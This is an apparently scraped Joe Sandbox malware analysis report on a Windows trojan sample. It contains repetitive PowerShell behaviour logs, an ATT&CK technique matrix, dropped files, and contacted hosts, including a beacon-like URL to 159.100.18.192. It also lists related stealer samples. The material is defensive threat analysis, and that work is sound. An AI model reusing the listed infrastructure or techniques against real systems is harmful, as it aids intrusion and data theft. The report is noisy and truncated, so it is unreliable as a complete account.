Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 1 Masquerading | 11 Input Capture | 21 Security Software Discovery | Remote Services | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 12 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 32 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
[Behavior graph. ID: 1574722; Sample: AyqwnIUrcz.exe; Startdate: 13/12/2024; Architecture: WINDOWS; Score: 56]

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
AyqwnIUrcz.exe | 18% | ReversingLabs | Win32.Trojan.Malgent |

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\ffmpeg.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\IoNixNginx.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\ffmpeg.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dll | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
www.google.com | 172.217.19.228 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://159.100.18.192/login.php?event=init&id=cHJlZmluYWw=&data= | | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://crbug.com/dawn/792IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://arianna.libero.it/search/abin/integrata.cgi?query=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://odvr.nic.cz/dohIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                          high
                                                                                                          https://crbug.com/dawn/673IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://imgs.sapo.pt/images/sapo.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                            high
                                                                                                            https://search.privacywall.org/suggest.php?q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                              high
                                                                                                              https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                high
                                                                                                                https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.quad9.net/home/privacy/IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.yandex.ua/chrome/newtabIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://id.search.yahoo.com/favicon.icoIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                    high
                                                                                                                    https://search.daum.net/search?w=tot&DA=JU5&q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                      high
                                                                                                                      https://search.naver.com/search.naver?ie=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                        high
                                                                                                                        https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                          high
                                                                                                                          http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://doh.cleanbrowsing.org/doh/adult-filterIoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
IP              Domain                     Country        ASN    ASN Name                        Malicious
172.217.19.228  www.google.com             United States  15169  GOOGLEUS                        false
159.100.18.192  unknown                    Germany        44066  DE-FIRSTCOLOwwwfirst-colonetDE  false
172.64.41.3     chrome.cloudflare-dns.com  United States  13335  CLOUDFLARENETUS                 false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574722
Start date and time: 2024-12-13 14:45:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 64
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AyqwnIUrcz.exe (renamed because original name is a hash value)
Original Sample Name: d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45.exe
Detection: MAL
Classification: mal56.winEXE@75/167@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.80.35, 13.107.246.63, 20.109.210.53, 184.28.90.27
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsps.ssl.com, ctldl.windowsupdate.com, time.windows.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: AyqwnIUrcz.exe
Time      Type             Description
10:31:46  API Interceptor  386x Sleep call for process: powershell.exe modified
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 31.172.83.147
                                                                                                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dll
nanophanotool.exe | malicious | LummaC Stealer
9VbeqQbgU4.exe | malicious | RedLine, SectopRAT
9VbeqQbgU4.exe | malicious | RedLine, SectopRAT
ivySCI-5.6.3.exe | malicious | Unknown
ivySCI-5.6.3.exe | malicious | Unknown
MayitaV16.exe | malicious | Unknown
Xa04iTOvv5.exe | malicious | Unknown
Setup.exe | malicious | Unknown
ArenaWarsSetup.exe | malicious | Unknown
ArenaWarsSetup.exe | malicious | Unknown
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3008
                                                                                                                                                                      Entropy (8bit):5.484142676712211
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:HizsSU4y4RQmFoUeCamfm9qr9t5/78NQffii+RlxJZKaVEouYAgwd64rHLjtvWb:HizlHyIFKL2O9qrh7KWKjJ5Eo9Adrxe
                                                                                                                                                                      MD5:E7F4E6A95A236D39879502C061681196
                                                                                                                                                                      SHA1:24DC89D9FDA1A285757442BCBDEEDEFFE779FA1E
                                                                                                                                                                      SHA-256:F38727DE6011B26D09FB467B398CA19B8BD6608E30A542808D9A123D9ED26DA6
                                                                                                                                                                      SHA-512:AE0236BFCCB832B2BAE65FB3D524A45B7F0583D6C963381E3EC64F9EA8B336AD36279EF810B674CCC991B46ABFB383B2F39292761647283B1CE11F1EE30BD749
                                                                                                                                                                      Malicious:false
